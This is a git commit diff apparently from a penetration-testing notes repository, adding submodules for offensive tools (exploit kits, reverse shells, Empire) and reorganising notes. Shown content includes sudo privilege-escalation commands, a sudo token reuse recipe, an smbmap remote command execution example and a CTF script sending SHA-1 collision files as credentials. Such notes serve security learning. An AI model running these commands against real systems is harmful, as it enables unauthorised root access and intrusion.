178 changed files with 2485 additions and 102 deletions
--- a/.gitmodules
+++ b/.gitmodules
@ -13,6 +13,9 @@
 [submodule "reverse_shells/One-Lin3r"]
 	path = reverse_shells/One-Lin3r
 	url = https://github.com/D4Vinci/One-Lin3r.git
+[submodule "exploit/web/php/Chankro"]
+	path = exploit/web/php/Chankro
+	url = https://github.com/TarlogicSecurity/Chankro.git
 [submodule "enumeration/enumeration"]
 	path = enumeration/enumeration
 	url = https://github.com/digininja/CeWL.git
@ -31,6 +34,9 @@
 [submodule "enumeration/priv_esc/deepce"]
 	path = enumeration/priv_esc/deepce
 	url = https://github.com/stealthcopter/deepce.git
+[submodule "exploit/web/content_security_policy/JSONBee"]
+	path = exploit/web/content_security_policy/JSONBee
+	url = https://github.com/zigoo0/JSONBee.git
 [submodule "post_exploitation/firefox_decrypt"]
 	path = post_exploitation/firefox_decrypt
 	url = https://github.com/unode/firefox_decrypt.git
@ -49,30 +55,63 @@
 [submodule "reverse_shells/phpreverseshell"]
 	path = reverse_shells/phpreverseshell
 	url = https://github.com/rootkral4/phpreverseshell.git
+[submodule "exploit/web/xxe/xxeserv"]
+	path = exploit/web/xxe/xxeserv
+	url = https://github.com/staaldraad/xxeserv.git
 [submodule "reverse_engineering/SCDBG"]
 	path = reverse_engineering/SCDBG
 	url = https://github.com/dzzie/SCDBG.git
 [submodule "reverse_engineering/java/deobfuscator"]
 	path = reverse_engineering/java/deobfuscator
 	url = https://github.com/java-deobfuscator/deobfuscator.git
+[submodule "exploit/windows/CrackMapExec"]
+	path = exploit/windows/CrackMapExec
+	url = https://github.com/byt3bl33d3r/CrackMapExec.git
 [submodule "telecommunications/sipvicious"]
 	path = telecommunications/sipvicious
 	url = https://github.com/EnableSecurity/sipvicious.git
 [submodule "exploit/windows/PrintNightmare"]
 	path = exploit/windows/PrintNightmare
 	url = https://github.com/ly4k/PrintNightmare.git
+[submodule "exploit/web/php/phpggc"]
+	path = exploit/web/php/phpggc
+	url = https://github.com/ambionics/phpggc.git
 [submodule "post_exploitation/priv_esc/sucrack"]
 	path = post_exploitation/priv_esc/sucrack
 	url = https://github.com/hemp3l/sucrack.git
+[submodule "exploit/java/JNDI-Exploit-Kit"]
+	path = exploit/java/JNDI-Exploit-Kit
+	url = https://github.com/pimps/JNDI-Exploit-Kit.git
+[submodule "exploit/binaries/buffer_overflow/ropstar"]
+	path = exploit/binaries/buffer_overflow/ropstar
+	url = https://github.com/xct/ropstar.git
+[submodule "exploit/java/log4j-scan"]
+	path = exploit/java/log4j-scan
+	url = https://github.com/fullhunt/log4j-scan.git
 [submodule "exploit/windows/printspoofer"]
 	path = exploit/windows/printspoofer
 	url = https://github.com/dievus/printspoofer.git
 [submodule "post_exploitation/powershell"]
 	path = post_exploitation/powershell
 	url = https://github.com/puckiestyle/powershell.git
+[submodule "exploit/macOS/ds_store_exp"]
+	path = exploit/macOS/ds_store_exp
+	url = https://github.com/lijiejie/ds_store_exp.git
+[submodule "exploit/macOS/DS_Store_crawler_parser"]
+	path = exploit/macOS/DS_Store_crawler_parser
+	url = https://github.com/anantshri/DS_Store_crawler_parser.git
+[submodule "exploit/macOS/Python-dsstore"]
+	path = exploit/macOS/Python-dsstore
+	url = https://github.com/gehaxelt/Python-dsstore.git
 [submodule "post_exploitation/armitage"]
 	path = post_exploitation/armitage
 	url = https://gitlab.com/kalilinux/packages/armitage.git
+[submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"]
+	path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
+	url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git
+[submodule "exploit/padding/PadBuster"]
+	path = exploit/padding/PadBuster
+	url = https://github.com/AonCyberLabs/PadBuster.git
 [submodule "post_exploitation/bc_security/Empire"]
 	path = post_exploitation/bc_security/Empire
 	url = https://github.com/BC-SECURITY/Empire.git
@ -82,6 +121,33 @@
 [submodule "misc/bruteforce/patator"]
 	path = misc/bruteforce/patator
 	url = https://github.com/lanjelot/patator.git
+[submodule "exploit/samba/smbmap"]
+	path = exploit/samba/smbmap
+	url = https://github.com/ShawnDEvans/smbmap.git
+[submodule "exploit/web/beef"]
+	path = exploit/web/beef
+	url = https://github.com/beefproject/beef.git
+[submodule "exploit/web/jwt/jwt-cracker"]
+	path = exploit/web/jwt/jwt-cracker
+	url = https://github.com/lmammino/jwt-cracker.git
+[submodule "exploit/web/jwt/jwt_tool"]
+	path = exploit/web/jwt/jwt_tool
+	url = https://github.com/ticarpi/jwt_tool.git
+[submodule "exploit/web/ssti/tplmap"]
+	path = exploit/web/ssti/tplmap
+	url = https://github.com/epinna/tplmap.git
+[submodule "exploit/windows/impacket"]
+	path = exploit/windows/impacket
+	url = https://github.com/SecureAuthCorp/impacket.git
+[submodule "exploit/windows/windows-kernel-exploits"]
+	path = exploit/windows/windows-kernel-exploits
+	url = https://github.com/SecWiki/windows-kernel-exploits.git
+[submodule "exploit/PayloadsAllTheThings"]
+	path = exploit/PayloadsAllTheThings
+	url = https://github.com/swisskyrepo/PayloadsAllTheThings.git
+[submodule "exploit/GitTools"]
+	path = exploit/GitTools
+	url = https://github.com/internetwache/GitTools
 [submodule "misc/level3_hypervisor/docker_sec/dive"]
 	path = misc/level3_hypervisor/docker_sec/dive
 	url = https://github.com/wagoodman/dive.git
@ -103,3 +169,9 @@
 [submodule "reverse_shells/windows/evil-winrm"]
 	path = reverse_shells/windows/evil-winrm
 	url = https://github.com/Hackplayers/evil-winrm.git
+[submodule "exploit/level3_hypervisor/docker_sec/dive"]
+	path = exploit/level3_hypervisor/docker_sec/dive
+	url = https://github.com/wagoodman/dive.git
+[submodule "exploit/level3_hypervisor/kubeletctl"]
+	path = exploit/level3_hypervisor/kubeletctl
+	url = https://github.com/cyberark/kubeletctl.git
--- a/Exploits/Linux/sudo.md
+++ b/Exploits/Linux/sudo.md
@ -1,58 +0,0 @@
-# CVE-2021-3156 Baron Samedit
-
-* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)
-* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git)
-* Heap based overflow
-* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
-* Check vulnerability via
-```sh
-sudoedit -s '\' $(python -c "print('\x41' * 10000)")
-```
-* Defaults to try
-```sh
-./brute.sh 90 120 50 70 150 300
-```
-
-## CVE-2019-14287
-
-* Versions < 1.8.28
-
-### Usage 
-
-* Integer overflow with resulting root status.
-```sh
-sudo -u#-1 <app>
-```
-## CVE-18634 
-
-* Sudo pwnge with pwfeedback()
-* Sudo version 1.7.1 to 1.8.30
-* [Saleem's github](https://github.com/saleemrashid/sudo-cve-2019-18634)
-
-
-## Reusing Sudo Token
-
-* Reuse sudo token of currently logged in user
-* [Hacktricks' site](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens)
-
-* `ptrace` has to be fully enabled
-```sh
-cat /proc/sys/kernel/yama/ptrace_scope
-0
-```
-* sudo has to be triggered the last 15 minutes, check `ps wuax`
-* `gdb` has to be installed
-* One must be logged in as the same user which should be owned
-* Use [nongiach's exploit](https://github.com/nongiach/sudo_inject)
-
-## Heap Based Overflow
-
-* [CVE-2022-43995](https://bugzilla.redhat.com/show_bug.cgi?id=2139911)
-
-Marco Benatto: 
-> Sudo 1.8.0 through 1.9.12, with the crypt() password backend, contains  
-a plugins/sudoers/auth/passwd.c array-out-of-bounds error that can result  
-in a heap-based buffer over-read. This can be triggered by arbitrary local  
-users with access to Sudo by entering a password of seven characters or 
- fewer. The impact could vary depending on the compiler and processor architecture.
-
--- a/Exploits/Printers/preta.md
+++ b/Exploits/Printers/preta.md
@ -1,4 +0,0 @@
-# Printer Hacking
-
-* [Preta](https://github.com/RUB-NDS/PRET)
-* [Cheat Sheet](http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet)
--- a/Exploits/References.md
+++ b/Exploits/References.md
@ -1,38 +0,0 @@
-# Exploit References
-
-[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings.git)
-
-## Recover git Repositories
-[Internetwache's gitTools](https://github.com/internetwache/GitTools.git)
-
-## Web
-
-[Padbuster - padding Oracle Attacks](https://github.com/AonCyberLabs/PadBuster.git)
-
-## Printer Exploitation
-[RUB-NDS Printer Exploitation Framework](https://github.com/RUB-NDS/PRET.git)
-
-## Python
-
-[pwntools doc](https://docs.pwntools.com/en/stable/)
-[pwntools installation](https://docs.pwntools.com/en/stable/install.html)
-
-## Java
-
-[fullhunt's log4j-scan](https://github.com/fullhunt/log4j-scan.git)
-[pimps' JNID-Exploit-Kit](https://github.com/pimps/JNDI-Exploit-Kit.git)
-
-## Linux
-
-[DirtyPipe](https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git)
-
-## macOS
-
-[DS Store Crawler Parser](https://github.com/anantshri/DS_Store_crawler_parser.git)
-[DS Store Exp](https://github.com/lijiejie/ds_store_exp.git)
-[DS Store Exp Python3](https://github.com/qiuluo-oss/ds_store_exp_py3.git)
-
-## Windows
-
-[PowerSploit](https://github.com/PowerShellMafia/PowerSploit.git)
-[nishang](https://github.com/samratashok/nishang.git)
--- a/Exploits/CPUs/Meltdown.md
+++ b/Exploits/CPUs/Meltdown.md
--- a/exploit/GitTools
+++ b/exploit/GitTools
@ -0,0 +1 @@
+Subproject commit 7cac63a2c141cdf2ab0f854e790ace3f430304f4
--- a/exploit/PayloadsAllTheThings
+++ b/exploit/PayloadsAllTheThings
@ -0,0 +1 @@
+Subproject commit 7fe0a0475eebc544f0c469e7a89030c6b4fecf31
--- a/Exploits/Binaries/Shellcode.md
+++ b/Exploits/Binaries/Shellcode.md
--- a/Exploits/Binaries/ASLR.md
+++ b/Exploits/Binaries/ASLR.md
--- a/exploit/binaries/buffer_overflow/bad_chars.py
+++ b/exploit/binaries/buffer_overflow/bad_chars.py
--- a/exploit/binaries/buffer_overflow/brainstorm.py
+++ b/exploit/binaries/buffer_overflow/brainstorm.py
--- a/exploit/binaries/buffer_overflow/buffer_overflow.py
+++ b/exploit/binaries/buffer_overflow/buffer_overflow.py
--- a/exploit/binaries/buffer_overflow/docs/amd64.md
+++ b/exploit/binaries/buffer_overflow/docs/amd64.md
--- a/exploit/binaries/buffer_overflow/docs/amd64_instructions.md
+++ b/exploit/binaries/buffer_overflow/docs/amd64_instructions.md
--- a/exploit/binaries/buffer_overflow/docs/buffer_overflow.md
+++ b/exploit/binaries/buffer_overflow/docs/buffer_overflow.md
--- a/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.md
+++ b/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.md
--- a/exploit/binaries/buffer_overflow/docs/pwntools_specifics.md
+++ b/exploit/binaries/buffer_overflow/docs/pwntools_specifics.md
--- a/exploit/binaries/buffer_overflow/docs/ret_address_reuse.md
+++ b/exploit/binaries/buffer_overflow/docs/ret_address_reuse.md
--- a/exploit/binaries/buffer_overflow/docs/shellcodes/setreuid_shell.as
+++ b/exploit/binaries/buffer_overflow/docs/shellcodes/setreuid_shell.as
--- a/exploit/binaries/buffer_overflow/docs/shellcodes/setuid_shell.as
+++ b/exploit/binaries/buffer_overflow/docs/shellcodes/setuid_shell.as
--- a/exploit/binaries/buffer_overflow/fuzzer.py
+++ b/exploit/binaries/buffer_overflow/fuzzer.py
--- a/exploit/binaries/buffer_overflow/fuzzer2.py
+++ b/exploit/binaries/buffer_overflow/fuzzer2.py
--- a/exploit/binaries/buffer_overflow/fuzzer_BO.py
+++ b/exploit/binaries/buffer_overflow/fuzzer_BO.py
--- a/exploit/binaries/buffer_overflow/pwn_fuzz.py
+++ b/exploit/binaries/buffer_overflow/pwn_fuzz.py
--- a/exploit/binaries/buffer_overflow/ropping.md
+++ b/exploit/binaries/buffer_overflow/ropping.md
--- a/exploit/binaries/buffer_overflow/ropstar
+++ b/exploit/binaries/buffer_overflow/ropstar
@ -0,0 +1 @@
+Subproject commit f025a2e4923b501d68d24fa44b22869a84e29e3e
--- a/exploit/binaries/canary_bypass/canary_bypass.md
+++ b/exploit/binaries/canary_bypass/canary_bypass.md
--- a/exploit/binaries/canary_bypass/canary_bypass.py
+++ b/exploit/binaries/canary_bypass/canary_bypass.py
--- a/exploit/binaries/format_string/format_string.md
+++ b/exploit/binaries/format_string/format_string.md
--- a/exploit/binaries/integral_promotion/integral_promotion.md
+++ b/exploit/binaries/integral_promotion/integral_promotion.md
--- a/Exploits/Binaries/PLT+GOT.md
+++ b/Exploits/Binaries/PLT+GOT.md
--- a/Exploits/Binaries/radare2.md
+++ b/Exploits/Binaries/radare2.md
--- a/Exploits/Binaries/ret2libc.md
+++ b/Exploits/Binaries/ret2libc.md
--- a/exploit/dns/zone_transfer.md
+++ b/exploit/dns/zone_transfer.md
--- a/exploit/hashes/collision.md
+++ b/exploit/hashes/collision.md
@ -0,0 +1,33 @@
+# Hash Collisions
+
+# SHA-1
+
+* http://shattered.io
+* The following code is taken from a writeup from [bl4ade's repo](https://github.com/bl4de/ctf/blob/master/2017/BostonKeyParty_2017/Prudentialv2/Prudentialv2_Cloud_50.md)
+```python
+#!/usr/bin/env python
+import requests
+
+# this is copy/paste from Hex editor - two different files with the same SHA1 checksum
+name = '255044462D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7F46DC93 A6B67E01 3B029AAA 1DB2560B 45CA67D6 88C7F84B 8C4C791F E02B3DF6 14F86DB1 690901C5 6B45C153 0AFEDFB7 6038E972 722FE7AD 728F0E49 04E046C2 30570FE9 D41398AB E12EF5BC 942BE335 42A4802D 98B5D70F 2A332EC3 7FAC3514 E74DDC0F 2CC1A874 CD0C7830 5A215664 61309789 606BD0BF 3F98CDA8 044629A1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'
+
+password = '25504446 2D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7346DC91 66B67E11 8F029AB6 21B2560F F9CA67CC A8C7F85B A84C7903 0C2B3DE2 18F86DB3 A90901D5 DF45C14F 26FEDFB3 DC38E96A C22FE7BD 728F0E45 BCE046D2 3C570FEB 141398BB 552EF5A0 A82BE331 FEA48037 B8B5D71F 0E332EDF 93AC3500 EB4DDC0D ECC1A864 790C782C 76215660 DD309791 D06BD0AF 3F98CDA4 BC4629B1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'
+
+print '[+] create URL decoded strings to send as GET parameters [name] and [password]...'
+name = ''.join(name.split(' '))
+password = ''.join(password.split(' '))
+
+namestr = ''.join(['%' + name[i] + name[i + 1]
+           for i in range(0, len(name)) if i % 2 == 0])
+
+passwordstr = ''.join(['%' + password[j] + password[j + 1]
+           for j in range(0, len(password)) if j % 2 == 0])
+
+print '[+] sending request to http://54.202.82.13/?name=[name]&password=[password]'
+
+u = 'http://54.202.82.13/?name={}&password={}'.format(namestr, passwordstr)
+
+resp = requests.get(u, headers={
+    'Host': '54.202.82.13'
+})
+```
--- a/Exploits/ImageMagick/ImageTragick.md
+++ b/Exploits/ImageMagick/ImageTragick.md
--- a/exploit/java/JNDI-Exploit-Kit
+++ b/exploit/java/JNDI-Exploit-Kit
@ -0,0 +1 @@
+Subproject commit e464facbc761a1b3530181a6f37c95925c197551
--- a/exploit/java/OGNL/cve_2022_26134.md
+++ b/exploit/java/OGNL/cve_2022_26134.md
--- a/exploit/java/ghidra_debug.md
+++ b/exploit/java/ghidra_debug.md
--- a/Exploits/Java/Ghostcat.md
+++ b/Exploits/Java/Ghostcat.md
--- a/exploit/java/log4j-scan
+++ b/exploit/java/log4j-scan
@ -0,0 +1 @@
+Subproject commit ceae24f4ebdbbdfc1dc350bab4d512d9dcf8027c
--- a/Exploits/Java/Log4Shell.md
+++ b/Exploits/Java/Log4Shell.md
--- a/Exploits/Java/Spring4Shell.md
+++ b/Exploits/Java/Spring4Shell.md
--- a/exploit/level3_hypervisor/docker_sec/dive
+++ b/exploit/level3_hypervisor/docker_sec/dive
@ -0,0 +1 @@
+Subproject commit c7d121b3d72aeaded26d5731819afaf49b686df6
--- a/exploit/level3_hypervisor/docker_sec/docker.md
+++ b/exploit/level3_hypervisor/docker_sec/docker.md
--- a/exploit/level3_hypervisor/kubeletctl
+++ b/exploit/level3_hypervisor/kubeletctl
@ -0,0 +1 @@
+Subproject commit 63a7ba9787c53857b299a728744f4d120795bf20
--- a/exploit/level3_hypervisor/kubernetes.md
+++ b/exploit/level3_hypervisor/kubernetes.md
--- a/exploit/level3_hypervisor/lxc.md
+++ b/exploit/level3_hypervisor/lxc.md
--- a/exploit/level3_hypervisor/microk8s.md
+++ b/exploit/level3_hypervisor/microk8s.md
--- a/Exploits/Linux/Capabilities.md
+++ b/Exploits/Linux/Capabilities.md
--- a/exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
+++ b/exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
@ -0,0 +1 @@
+Subproject commit e1fd1f65caa686bbb1510ae07efbdc3a0e4b8330
--- a/exploit/linux/dirty_pipe/dirty_pipe.md
+++ b/exploit/linux/dirty_pipe/dirty_pipe.md
--- a/Exploits/Linux/ExifTool.md
+++ b/Exploits/Linux/ExifTool.md
--- a/Exploits/Linux/Groups.md
+++ b/Exploits/Linux/Groups.md
--- a/exploit/linux/ld_preload.md
+++ b/exploit/linux/ld_preload.md
--- a/exploit/linux/nfs_rootsquash.md
+++ b/exploit/linux/nfs_rootsquash.md
--- a/Exploits/Linux/OverlayFS.md
+++ b/Exploits/Linux/OverlayFS.md
--- a/exploit/linux/pkexec/CVE_2021_4034.md
+++ b/exploit/linux/pkexec/CVE_2021_4034.md
--- a/Exploits/Linux/PolKit.md
+++ b/Exploits/Linux/PolKit.md
--- a/exploit/linux/racing_conditions.md
+++ b/exploit/linux/racing_conditions.md
--- a/Exploits/Linux/SetCap.md
+++ b/Exploits/Linux/SetCap.md
--- a/exploit/linux/shared_object_injection.md
+++ b/exploit/linux/shared_object_injection.md
--- a/exploit/linux/shell_shock.md
+++ b/exploit/linux/shell_shock.md
--- a/exploit/linux/sudo/CVE_2019_14287.md
+++ b/exploit/linux/sudo/CVE_2019_14287.md
@ -0,0 +1,9 @@
+# CVE-2019-14287
+
+* Versions < 1.8.28
+
+## Usage 
+* Integer overflow with resulting root status.
+```sh
+sudo -u#-1 <app>
+```
--- a/exploit/linux/sudo/CVE_2019_18634.md
+++ b/exploit/linux/sudo/CVE_2019_18634.md
@ -0,0 +1,4 @@
+# Sudo pwnge with pwfeedback()
+
+* Sudo version 1.7.1 to 1.8.30
+* [Saleem's github](https://github.com/saleemrashid/sudo-cve-2019-18634)
--- a/exploit/linux/sudo/baron_samedit.md
+++ b/exploit/linux/sudo/baron_samedit.md
@ -0,0 +1,14 @@
+# CVE-2021-3156 Baron Samedit
+
+* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)
+* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git)
+* Heap based overflow
+* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
+* Check vulnerability via
+```sh
+sudoedit -s '\' $(python -c "print('\x41' * 10000)")
+```
+* Defaults to try
+```sh
+./brute.sh 90 120 50 70 150 300
+```
--- a/exploit/linux/sudo/tokens.md
+++ b/exploit/linux/sudo/tokens.md
@ -0,0 +1,14 @@
+# Reusing Sudo Token
+
+* Reuse sudo token of currently logged in user
+* [Hacktricks' site](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens)
+
+* `ptrace` has to be fully enabled
+```sh
+cat /proc/sys/kernel/yama/ptrace_scope
+0
+```
+* sudo has to be triggered the last 15 minutes, check `ps wuax`
+* `gdb` has to be installed
+* One must be logged in as the same user which should be owned
+* Use [nongiach's exploit](https://github.com/nongiach/sudo_inject)
--- a/exploit/linux/wildard_exploitation.md
+++ b/exploit/linux/wildard_exploitation.md
--- a/exploit/macOS/DS_Store_crawler_parser
+++ b/exploit/macOS/DS_Store_crawler_parser
@ -0,0 +1 @@
+Subproject commit 9e003a3196570a8e882e55cf9824fd3bf98886be
--- a/exploit/macOS/Python-dsstore
+++ b/exploit/macOS/Python-dsstore
@ -0,0 +1 @@
+Subproject commit 859781b834244774cb509e96ccc29ee646f72739
--- a/exploit/macOS/ds_store_exp
+++ b/exploit/macOS/ds_store_exp
@ -0,0 +1 @@
+Subproject commit 784eada6cd08739032b7fdc124a8c93abcb0c2f7
--- a/exploit/network/mac_spoofing.md
+++ b/exploit/network/mac_spoofing.md
--- a/exploit/padding/PadBuster
+++ b/exploit/padding/PadBuster
@ -0,0 +1 @@
+Subproject commit 50e4a3e2bf5dfff5699440b3ebc61ed1b5c49bbe
--- a/exploit/padding/padbuster.md
+++ b/exploit/padding/padbuster.md
--- a/exploit/python/code_injection.md
+++ b/exploit/python/code_injection.md
--- a/exploit/python/flask_cookie_decode.py
+++ b/exploit/python/flask_cookie_decode.py
--- a/exploit/python/jail_escape.md
+++ b/exploit/python/jail_escape.md
--- a/exploit/python/lib_hijack.md
+++ b/exploit/python/lib_hijack.md
--- a/Exploits/Python/Pickle.md
+++ b/Exploits/Python/Pickle.md
--- a/Exploits/Python/pwntools.md
+++ b/Exploits/Python/pwntools.md
--- a/Exploits/Python/Decompile
+++ b/Exploits/Python/Decompile
--- a/Exploits/Python/Scapy.md
+++ b/Exploits/Python/Scapy.md
--- a/exploit/samba/smbmap
+++ b/exploit/samba/smbmap
@ -0,0 +1 @@
+Subproject commit 5c98c5f40a0aefaf374904ab53d6c03ba5b7a003
--- a/exploit/samba/smbmap.md
+++ b/exploit/samba/smbmap.md
@ -0,0 +1,12 @@
+# smbmap
+
+* [Repo](https://github.com/ShawnDEvans/smbmap.git)
+* `python3 -m pip install -r requirements.txt`
+
+# Usage
+* `-x` execute command on server
+* `-s` enumerate share
+
+```sh
+smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig'
+```
--- a/Exploits/Databases/MSSQL.md
+++ b/Exploits/Databases/MSSQL.md
--- a/Exploits/Databases/NoSQL
+++ b/Exploits/Databases/NoSQL
--- a/Exploits/Databases/SQL
+++ b/Exploits/Databases/SQL
--- a/Exploits/Databases/SQLmap.md
+++ b/Exploits/Databases/SQLmap.md
@ -20,7 +20,6 @@ sqlmap -u http://<target-IP>/site.php --forms --dump-all


 |Parameter|Details|
-|---------|-------|
 |-r|Uses the intercepted request save as a file|
 |--dbms|DBMS of target|
 |--dump|Dump the entire database|
--- a/Exploits/SSL+TLS/Heartbleed.md
+++ b/Exploits/SSL+TLS/Heartbleed.md
--- a/exploit/web/beef
+++ b/exploit/web/beef
@ -0,0 +1 @@
+Subproject commit 72261c4fcd39601effa474274608347033e1d492
--- a/exploit/web/bypass_rate_limiting/bypass_rate_limiting.md
+++ b/exploit/web/bypass_rate_limiting/bypass_rate_limiting.md
--- a/exploit/web/command_injection.md
+++ b/exploit/web/command_injection.md
--- a/exploit/web/content_security_policy/JSONBee
+++ b/exploit/web/content_security_policy/JSONBee
@ -0,0 +1 @@
+Subproject commit 1a518ddf695ae3093ff637c5958802715e890d88
--- a/exploit/web/content_security_policy/content_security_policy.md
+++ b/exploit/web/content_security_policy/content_security_policy.md
--- a/exploit/web/cookie_tampering.md
+++ b/exploit/web/cookie_tampering.md
--- a/Exploits/Web/CSRF.md
+++ b/Exploits/Web/CSRF.md
--- a/exploit/web/forced_browsing/forced_browsing.md
+++ b/exploit/web/forced_browsing/forced_browsing.md
--- a/exploit/web/http_header_injection.md
+++ b/exploit/web/http_header_injection.md
--- a/exploit/web/idor/idor.md
+++ b/exploit/web/idor/idor.md
--- a/exploit/web/javascript/bypass_filters.md
+++ b/exploit/web/javascript/bypass_filters.md
--- a/Show More
+++ b/Show More
				`@ -0,0 +1 @@`
				`Subproject commit 7cac63a2c141cdf2ab0f854e790ace3f430304f4`
				`@ -0,0 +1 @@`
				`Subproject commit 7fe0a0475eebc544f0c469e7a89030c6b4fecf31`
				`@ -0,0 +1 @@`
				`Subproject commit f025a2e4923b501d68d24fa44b22869a84e29e3e`
				`@ -0,0 +1 @@`
				`Subproject commit e464facbc761a1b3530181a6f37c95925c197551`
				`@ -0,0 +1 @@`
				`Subproject commit ceae24f4ebdbbdfc1dc350bab4d512d9dcf8027c`
				`@ -0,0 +1 @@`
				`Subproject commit c7d121b3d72aeaded26d5731819afaf49b686df6`
				`@ -0,0 +1 @@`
				`Subproject commit 63a7ba9787c53857b299a728744f4d120795bf20`
				`@ -0,0 +1 @@`
				`Subproject commit e1fd1f65caa686bbb1510ae07efbdc3a0e4b8330`
				`@ -0,0 +1 @@`
				`Subproject commit 9e003a3196570a8e882e55cf9824fd3bf98886be`
				`@ -0,0 +1 @@`
				`Subproject commit 859781b834244774cb509e96ccc29ee646f72739`